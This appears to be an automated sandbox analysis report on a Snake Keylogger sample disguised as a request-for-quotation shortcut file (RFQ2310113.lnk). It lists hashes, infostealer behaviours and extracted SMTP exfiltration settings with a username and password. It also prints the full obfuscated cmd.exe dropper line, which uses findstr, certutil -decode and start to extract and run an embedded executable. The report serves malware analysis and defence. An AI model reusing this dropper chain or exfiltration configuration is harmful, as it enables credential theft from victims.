Analysis
- max time kernel: 120s
- max time network: 151s
- platform: windows7_x64
- resource: win7-20230831-en
- resource tags: arch:x64, arch:x86, image:win7-20230831-en, locale:en-us, os:windows7-x64, system
- submitted: 12-10-2023 06:57
Static task: static1
Behavioral task: behavioral1
  Sample: RFQ2310113.lnk
  Resource: win7-20230831-en
Behavioral task: behavioral2
  Sample: RFQ2310113.lnk
  Resource: win10v2004-20230915-en
General
- Target: RFQ2310113.lnk
- Size: 189KB
- MD5: b63351d03fd881836a5ac5e41a9dcfd3
- SHA1: ef1527ae584e66a30f6445ef7aa24fb0a224ee38
- SHA256: 32540260cd472fad0798b97d44b8487c1bb9f18f7b68cfd3b2a01c457372fd4f
- SHA512: df063d7698db772421d3ed92f543cf96e34f171eb32b1efcb15572c639d670aad08e2178297f8c660eb4cba619bfeb21a4a0302f7cb9ca472668d83be1e5e6fc
- SSDEEP: 3072:dKYPSEKR8itPqPiGjuyLAfOjRBM/JgQMHMJJP7TWRhby:XP/KR8SZggG/SJgdOJP7TWRh+
Malware Config
Extracted
- Protocol: smtp
- Host: mail.avtorska.com.mk
- Port: 587
- Username: [email protected]
- Password: avtorska2014@
Extracted (snakekeylogger)
- Protocol: smtp
- Host: mail.avtorska.com.mk
- Port: 587
- Username: [email protected]
- Password: avtorska2014@
- Email To: [email protected]
Signatures
- Snake Keylogger
  Keylogger and Infostealer first seen in November 2020.
- Snake Keylogger payload (4 IoCs)
  Processes:
    resource | yara_rule
    \Users\Admin\AppData\Local\Temp\82be4ea8-5d23-429c-93f2-fcf0f8777efd.lnk | family_snakekeylogger
    C:\Users\Admin\AppData\Local\Temp\82be4ea8-5d23-429c-93f2-fcf0f8777efd.lnk | family_snakekeylogger
    C:\Users\Admin\AppData\Local\Temp\82be4ea8-5d23-429c-93f2-fcf0f8777efd.lnk | family_snakekeylogger
    behavioral1/memory/2640-43-0x000000013FEC0000-0x000000013FEE6000-memory.dmp | family_snakekeylogger
- Executes dropped EXE (1 IoCs)
  Processes:
    pid | process
    2640 | 82be4ea8-5d23-429c-93f2-fcf0f8777efd.lnk
- Loads dropped DLL (1 IoCs)
  Processes:
    pid | process
    2328 | cmd.exe
- Reads user/profile data of local email clients (2 TTPs)
  Email clients store some user data on disk, where infostealers will often target it.
- Reads user/profile data of web browsers (2 TTPs)
  Infostealers often target stored browser data, which can include saved credentials etc.
- Accesses Microsoft Outlook profiles (1 TTPs, 3 IoCs)
  Processes:
    description | ioc | process
    Key opened | \REGISTRY\USER\S-1-5-21-686452656-3203474025-4140627569-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | 82be4ea8-5d23-429c-93f2-fcf0f8777efd.lnk
    Key opened | \REGISTRY\USER\S-1-5-21-686452656-3203474025-4140627569-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | 82be4ea8-5d23-429c-93f2-fcf0f8777efd.lnk
    Key opened | \REGISTRY\USER\S-1-5-21-686452656-3203474025-4140627569-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | 82be4ea8-5d23-429c-93f2-fcf0f8777efd.lnk
- Looks up external IP address via web service (1 IoCs)
  Uses a legitimate IP lookup service to find the infected system's external IP.
  Processes:
    flow | ioc
    4 | checkip.dyndns.org
- Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s).
- Suspicious behavior: EnumeratesProcesses (2 IoCs)
  Processes:
    pid | process
    2640 | 82be4ea8-5d23-429c-93f2-fcf0f8777efd.lnk
    2640 | 82be4ea8-5d23-429c-93f2-fcf0f8777efd.lnk
- Suspicious use of AdjustPrivilegeToken (1 IoCs)
  Processes:
    description | pid | process
    Token: SeDebugPrivilege | 2640 | 82be4ea8-5d23-429c-93f2-fcf0f8777efd.lnk
- Suspicious use of WriteProcessMemory (12 IoCs)
  Processes:
    description | pid | process | target process
    PID 1872 wrote to memory of 2328 | 1872 | cmd.exe | cmd.exe
    PID 1872 wrote to memory of 2328 | 1872 | cmd.exe | cmd.exe
    PID 1872 wrote to memory of 2328 | 1872 | cmd.exe | cmd.exe
    PID 2328 wrote to memory of 2592 | 2328 | cmd.exe | findstr.exe
    PID 2328 wrote to memory of 2592 | 2328 | cmd.exe | findstr.exe
    PID 2328 wrote to memory of 2592 | 2328 | cmd.exe | findstr.exe
    PID 2328 wrote to memory of 2708 | 2328 | cmd.exe | certutil.exe
    PID 2328 wrote to memory of 2708 | 2328 | cmd.exe | certutil.exe
    PID 2328 wrote to memory of 2708 | 2328 | cmd.exe | certutil.exe
    PID 2328 wrote to memory of 2640 | 2328 | cmd.exe | 82be4ea8-5d23-429c-93f2-fcf0f8777efd.lnk
    PID 2328 wrote to memory of 2640 | 2328 | cmd.exe | 82be4ea8-5d23-429c-93f2-fcf0f8777efd.lnk
    PID 2328 wrote to memory of 2640 | 2328 | cmd.exe | 82be4ea8-5d23-429c-93f2-fcf0f8777efd.lnk
- outlook_office_path (1 IoCs)
  Processes:
    description | ioc | process
    Key opened | \REGISTRY\USER\S-1-5-21-686452656-3203474025-4140627569-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | 82be4ea8-5d23-429c-93f2-fcf0f8777efd.lnk
- outlook_win_path (1 IoCs)
  Processes:
    description | ioc | process
    Key opened | \REGISTRY\USER\S-1-5-21-686452656-3203474025-4140627569-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | 82be4ea8-5d23-429c-93f2-fcf0f8777efd.lnk
Processes
- C:\Windows\system32\cmd.exe (depth 1)
  Command line: cmd /c C:\Users\Admin\AppData\Local\Temp\RFQ2310113.lnk
  PID: 1872
  Signatures:
    - Suspicious use of WriteProcessMemory
  - C:\Windows\System32\cmd.exe (depth 2)
    Command line: "C:\Windows\System32\cmd.exe" /k "0BuHTtq7wyB1e3BR7VXBN1JkltCcyzcwj2TbqvGICjdRaiKsYpN3v2eOjdUTzBa44CdlUa8Dk8nd6UzvdBO78TnEaTdWGJec6mhskAtO8dN436zlURDoitxKJRTseR89a3r1HGeeeuoJAAchkhrhHGJyCinsRMHeywDbsaAhIuV8akh6A3hRliUnZQvl1fouGSZQuASgVQ1lphfxvsexc9UWyYbtJjzlw9Mc8wYgvgJmW74AXJMP6I6Cio & findstr "TVqQAAMAAAAEAAAA//8AALgAAAAAAAAA" RFQ2310113.lnk>C:\Users\Admin\AppData\Local\Temp\82be4ea8-5d23-429c-93f2-fcf0f8777efd.tmp & certutil -decode C:\Users\Admin\AppData\Local\Temp\82be4ea8-5d23-429c-93f2-fcf0f8777efd.tmp C:\Users\Admin\AppData\Local\Temp\82be4ea8-5d23-429c-93f2-fcf0f8777efd.lnk & start C:\Users\Admin\AppData\Local\Temp\82be4ea8-5d23-429c-93f2-fcf0f8777efd.lnk & del C:\Users\Admin\AppData\Local\Temp\82be4ea8-5d23-429c-93f2-fcf0f8777efd.tmp & exit & 0BuHTtq7wyB1e3BR7VXBN1JkltCcyzcwj2TbqvGICjdRaiKsYpN3v2eOjdUTzBa44CdlUa8Dk8nd6UzvdBO78TnEaTdWGJec6mhskAtO8dN436zlURDoitxKJRTseR89a3r1HGeeeuoJAAchkhrhHGJyCinsRMHeywDbsaAhIuV8akh6A3hRliUnZQvl1fouGSZQuASgVQ1lphfxvsexc9UWyYbtJjzlw9Mc8wYgvgJmW74AXJMP6I6Cio"
    PID: 2328
    Signatures:
      - Loads dropped DLL
      - Suspicious use of WriteProcessMemory
    - C:\Windows\system32\findstr.exe (depth 3)
      Command line: findstr "TVqQAAMAAAAEAAAA//8AALgAAAAAAAAA" RFQ2310113.lnk
      PID: 2592
    - C:\Windows\system32\certutil.exe (depth 3)
      Command line: certutil -decode C:\Users\Admin\AppData\Local\Temp\82be4ea8-5d23-429c-93f2-fcf0f8777efd.tmp C:\Users\Admin\AppData\Local\Temp\82be4ea8-5d23-429c-93f2-fcf0f8777efd.lnk
      PID: 2708
    - C:\Users\Admin\AppData\Local\Temp\82be4ea8-5d23-429c-93f2-fcf0f8777efd.lnk (depth 3)
      Command line: C:\Users\Admin\AppData\Local\Temp\82be4ea8-5d23-429c-93f2-fcf0f8777efd.lnk
      PID: 2640
      Signatures:
        - Executes dropped EXE
        - Accesses Microsoft Outlook profiles
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        - outlook_office_path
        - outlook_win_path
Network
MITRE ATT&CK Enterprise v15
Downloads
- Filesize: 139KB
  MD5: 4125ea2fb2e0729c7feee51c859ada21
  SHA1: 21e47553ff803b30c7fdc7be618a7443e37297bb
  SHA256: 32a063afcf2fba7e086632f90a32280448ad07c105d340cd44b079466ccb661d
  SHA512: 37bb2ab066b482931ca81c29ee116825d2a8786ef319ee658e883338a36ab612c8bebf34f5b1fae46797bf72fdfe6a26eed238015a225d7b2423c6190c81650d
- Filesize: 186KB
  MD5: 8a33bf953de2c0fbba1c4d84912ef6a2
  SHA1: 4c97c27f7e33f03f4e62f80eeb1a9f632b78b77c
  SHA256: f77c8b20606c1deac4ecfb4dbaa266d0909d9ea87912b0beeb99fc0766b3607f
  SHA512: 41ecfc158423f7b6441c2f0f7a9703b7e6990f724c569ca0edd7f4aa4d812e641dd8b4841c1b9b9d7e91ae7dcdbfa0cdc1878f26d0b6baa3af3dc46d03d651f1